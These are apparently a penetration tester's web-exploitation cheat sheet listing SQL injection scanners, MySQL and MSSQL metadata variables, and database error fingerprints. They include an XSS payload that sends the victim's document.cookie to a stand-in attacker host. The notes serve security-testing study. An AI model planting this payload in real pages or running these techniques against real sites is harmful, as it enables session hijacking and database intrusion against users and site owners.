• Most web exploiting should be done in OWASP Mantra . This browser is a derivative of Firefox that has lots of tools, plugins and addons integrated (with everything sanitized) to facilitate vulnerability finding.

Scanners:

• mieliekoek.pl (error)
• sqlmap (blind / union )
• w3af (error / blind)

Meta-information variables:

• @@datadir (MySQL)
• @@version (MySQL /MS SQL)
• user() (MySQL)
• database() (MySQL)

• XSS cookie stealing payload

  <script>
  function hack(){
     XSSImage=new Image;
     XSSImage.src="http://attacker's site.com/steal?stuff=" + document.cookie + "";
  }
  hack();
  </script>
  

• Database error fingerprints:
  • “ORA-01756: quoted string not properly terminated” → Oracle
  • “Incorrect Syntax near ” → MSSQL
  • “You have an error in your SQL syntax” → MySQL
  • Hex error code → PostgreSQL

• Use http://sqlfiddle.com to build schemas and test queries